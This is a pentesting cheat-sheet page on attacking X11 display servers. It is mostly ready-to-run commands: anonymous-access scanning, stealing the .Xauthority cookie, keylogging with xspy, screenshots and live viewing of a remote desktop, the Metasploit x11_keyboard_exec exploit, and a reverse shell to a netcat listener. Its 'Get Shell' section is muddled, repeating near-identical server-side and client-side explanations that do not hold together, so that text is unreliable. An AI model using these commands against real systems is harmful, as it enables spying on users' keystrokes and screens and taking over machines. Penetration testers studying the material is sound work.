hacktricks/network-services-pentesting/6000-pentesting-x11.md
2024-02-10 17:52:19 +00:00


6000 - Pentesting X11

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Join HackenProof Discord server to communicate with experienced hackers and bug bounty hunters!

Hacking Insights
Engage with content that delves into the thrill and challenges of hacking

Real-Time Hack News
Keep up-to-date with fast-paced hacking world through real-time news and insights

Latest Announcements
Stay informed with the newest bug bounties launching and crucial platform updates

Join us on Discord and start collaborating with top hackers today!

Basic Information

X Window System (X) is a versatile windowing system prevalent on UNIX-based operating systems. It provides a framework for creating graphical user interfaces (GUIs), with individual programs handling the user interface design. This flexibility allows for diverse and customizable experiences within the X environment.

Default port: 6000

PORT       STATE   SERVICE
6000/tcp   open    X11

Enumeration

Check for anonymous connection:

nmap -sV --script x11-access -p <PORT> <IP>
msf> use auxiliary/scanner/x11/open_x11
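
What the x11-access check above tests, shown at the protocol level as an added example (not code from the page, nmap or Metasploit): build the X11 ConnectionSetup request, empty for an anonymous connection or carrying an MIT-MAGIC-COOKIE-1, and classify the server's first reply (Success, Failed with its reason, or Authenticate). The two sample replies are constructed, and check_display is an assumed helper that sends the request to a listening display.

```python
import socket
import struct

def pad4(n):
    """Padding bytes needed to bring n up to a multiple of 4 (X11 pads every field)."""
    return (4 - n % 4) % 4

def build_setup_request(auth_name=b"", auth_data=b""):
    """X11 ConnectionSetup request, little-endian ('l'), protocol 11.0.
    Empty auth fields are exactly the 'anonymous' connection nmap's script tries."""
    hdr = struct.pack("<cxHHHHxx", b"l", 11, 0, len(auth_name), len(auth_data))
    return (hdr + auth_name + b"\0" * pad4(len(auth_name))
                + auth_data + b"\0" * pad4(len(auth_data)))

def parse_setup_reply(reply):
    """Classify the server's reply: status byte 1 = Success, 0 = Failed (byte 1 is
    the reason length, reason starts at offset 8), 2 = Authenticate (more data needed)."""
    if len(reply) < 8:
        raise ValueError("short X11 setup reply")
    status = reply[0]
    if status == 1:
        return "Success", ""
    if status == 0:
        return "Failed", reply[8:8 + reply[1]].decode("latin-1")
    if status == 2:
        (units,) = struct.unpack_from("<H", reply, 6)   # extra data, in 4-byte units
        return "Authenticate", reply[8:8 + 4 * units].decode("latin-1").rstrip("\0")
    raise ValueError(f"unknown status byte {status}")

def check_display(host, display=0, auth_name=b"", auth_data=b"", timeout=5):
    """Send the setup request to host:display (TCP 6000 + display) and report the outcome.
    A 'Success' with empty auth fields means the server accepts unauthenticated clients."""
    with socket.create_connection((host, 6000 + display), timeout=timeout) as s:
        s.sendall(build_setup_request(auth_name, auth_data))
        return parse_setup_reply(s.recv(4096))

# Constructed sample replies (not captured from a real host): a server rejecting an
# unauthenticated client with Xorg's usual reason text, and one accepting it.
SAMPLE_FAILED = (bytes([0, 21]) + struct.pack("<HHH", 11, 0, 6)
                 + b"No protocol specified" + b"\0" * 3)
SAMPLE_SUCCESS = bytes([1, 0]) + struct.pack("<HHH", 11, 0, 8) + b"\0" * 32
```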

Local Enumeration

The file .Xauthority in the users home folder is used by X11 for authorization. From here:

$ xxd ~/.Xauthority
00000000: 0100 0006 6d61 6e65 7063 0001 3000 124d  ............0..M
00000010: 4954 2d4d 4147 4943 2d43 4f4f 4b49 452d  IT-MAGIC-COOKIE-
00000020: 3100 108f 52b9 7ea8 f041 c49b 85d8 8f58  1...R.~..A.....X
00000030: 041d ef                                  ...

MIT-MAGIC-COOKIE-1: a 128-bit key ("cookie") is generated and stored in ~/.Xauthority (or wherever the XAUTHORITY environment variable points). The client sends it to the server in plaintext! The server checks whether it holds a copy of this cookie and, if so, the connection is permitted. The key is generated by DMX.

{% hint style="warning" %} In order to use the cookie you should set the env var: export XAUTHORITY=/path/to/.Xauthority {% endhint %}
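
Reading the dump above by hand is tedious, so here is an added parser for the .Xauthority binary format (example code, not from the page or from X.Org): each entry is a 16-bit big-endian family followed by four counted fields (address, display number, protocol name, secret). The input is the 51 bytes shown in the xxd dump; the XauthEntry and describe names are this example's own.

```python
import struct
from dataclasses import dataclass

# Constructed input: the 51 bytes shown in the xxd dump of ~/.Xauthority above.
XAUTH_BYTES = bytes.fromhex(
    "0100 0006 6d61 6e65 7063 0001 3000 124d"
    "4954 2d4d 4147 4943 2d43 4f4f 4b49 452d"
    "3100 108f 52b9 7ea8 f041 c49b 85d8 8f58"
    "041d ef"
)

# Address-family codes from <X11/Xauth.h>; 256 (FamilyLocal) is a UNIX-socket display.
FAMILIES = {0: "Internet", 6: "InternetV6", 254: "Wild", 256: "Local"}

@dataclass
class XauthEntry:
    family: int
    address: str   # hostname for Local; raw address bytes for the Internet families
    number: str    # display number, stored as text ("0")
    name: str      # authorization protocol, e.g. MIT-MAGIC-COOKIE-1
    data: bytes    # the secret itself: 16 bytes (128 bits) for MIT-MAGIC-COOKIE-1

def _counted(buf, pos):
    """Read one counted field: 16-bit big-endian length, then that many bytes."""
    (n,) = struct.unpack_from(">H", buf, pos)
    pos += 2
    if pos + n > len(buf):
        raise ValueError("truncated .Xauthority entry")
    return buf[pos:pos + n], pos + n

def parse_xauthority(buf):
    """Parse every entry of an .Xauthority file: family, then four counted fields."""
    entries, pos = [], 0
    while pos < len(buf):
        (family,) = struct.unpack_from(">H", buf, pos)
        address, pos = _counted(buf, pos + 2)
        number, pos = _counted(buf, pos)
        name, pos = _counted(buf, pos)
        data, pos = _counted(buf, pos)
        entries.append(XauthEntry(family, address.decode("latin-1"),
                                  number.decode("latin-1"),
                                  name.decode("latin-1"), data))
    return entries

def describe(entry):
    """One line per entry, in the spirit of `xauth list`, with the cookie in hex."""
    fam = FAMILIES.get(entry.family, str(entry.family))
    return f"{entry.address}/{fam}:{entry.number}  {entry.name}  {entry.data.hex()}"
```

Every entry the parser prints is a plaintext secret that grants full access to that display, which is why the file is mode 0600 and why the cookie should never leave the host unencrypted.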

Local Enumeration Session

$ w
23:50:48 up 1 day, 10:32,  1 user,  load average: 0.29, 6.48, 7.12
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
user     tty7     :0               13Oct23 76days 13:37   2.20s xfce4-session

In the example, localhost:0 was running xfce4-session.

Verify Connection

xdpyinfo -display <ip>:<display>
xwininfo -root -tree -display <IP>:<display> #Ex: xwininfo -root -tree -display 10.5.5.12:0

Keylogging

Use xspy to sniff the keyboard keystrokes.

Sample Output:

xspy 10.9.xx.xx

opened 10.9.xx.xx:0 for snoopng
swaBackSpaceCaps_Lock josephtTabcBackSpaceShift_L workShift_L 2123
qsaminusKP_Down KP_Begin KP_Down KP_Left KP_Insert TabRightLeftRightDeletebTabDownnTabKP_End KP_Right KP_Up KP_Down KP_Up KP_Up TabmtminusdBackSpacewinTab

Screenshots capturing

xwd -root -screen -silent -display <TargetIP:0> > screenshot.xwd
convert screenshot.xwd screenshot.png

Remote Desktop View

Method from: https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref

./xrdp.py <IP:0>

Method from: https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html

First, find the ID of the window using xwininfo:

xwininfo -root -display 10.9.xx.xx:0

xwininfo: Window id: 0x45 (the root window) (has no name)

Absolute upper-left X:  0
Absolute upper-left Y:  0
Relative upper-left X:  0
Relative upper-left Y:  0
Width: 1024
Height: 768
Depth: 16
Visual: 0x21
Visual Class: TrueColor
Border width: 0
Class: InputOutput
Colormap: 0x20 (installed)
Bit Gravity State: ForgetGravity
Window Gravity State: NorthWestGravity
Backing Store State: NotUseful
Save Under State: no
Map State: IsViewable
Override Redirect State: no
Corners:  +0+0  -0+0  -0-0  +0-0
-geometry 1024x768+0+0

XWatchwin

For live viewing, use xwatchwin with the window ID found with xwininfo:

./xwatchwin [-v] [-u UpdateTime] DisplayName { -w windowID | WindowName }   # -w takes the window ID reported by xwininfo
./xwatchwin 10.9.xx.xx:0 -w 0x45

Get Shell

Introduction

In this section, we will discuss various techniques to obtain a shell on a target system through X11 vulnerabilities. X11 is a network protocol used for graphical user interfaces (GUI) in Unix-like operating systems.

X11 Forwarding

X11 forwarding is a feature that allows the display of a graphical application running on a remote machine to be shown on a local machine. This feature can be exploited to gain access to the target system.

To enable X11 forwarding, use the -X or -Y option when connecting to the target system via SSH:

ssh -X user@target_ip

Once connected, you can run graphical applications on the target system, and the display will be forwarded to your local machine.

X11 Server-Side Attack

In some cases, the target system may have an X11 server running with weak or no access control. This can be exploited to execute arbitrary commands on the target system.

To check if the target system has an X11 server running, use the xhost command:

xhost

If the output reports that access control is disabled (the state set with xhost +), any client can connect to the X11 server, so it is vulnerable.

To exploit this vulnerability, set the DISPLAY environment variable to the attacker's IP address and execute the desired command:

export DISPLAY=attacker_ip:0
xterm

This will open an X11 terminal on the attacker's machine, with the display forwarded from the target system. From here, you can execute commands as if you were on the target system.

X11 Client-Side Attack

In some cases, the target system may have an X11 client running with weak or no access control. This can be exploited to execute arbitrary commands on the target system.

To exploit this vulnerability, set the DISPLAY environment variable to the attacker's IP address and execute the desired command:

export DISPLAY=attacker_ip:0
xterm -display target_ip:0

This will open an X11 terminal on the attacker's machine, with the display forwarded from the target system. From here, you can execute commands as if you were on the target system.

Conclusion

Obtaining a shell through X11 vulnerabilities can provide an attacker with significant control over a target system. It is important to be aware of these vulnerabilities and take appropriate measures to secure X11 servers and clients.

msf> use exploit/unix/x11/x11_keyboard_exec

Reverse Shell: Xrdp also allows taking a reverse shell via Netcat. Run the following command:

./xrdp.py <IP:0> no-disp

In the interface you can see the R-shell option.

Then, start a Netcat listener in your local system on port 5555.

nc -lvp 5555

Then, enter your IP address and port in the R-Shell option and click R-shell to get a shell.

Shodan

  • port:6000 x11
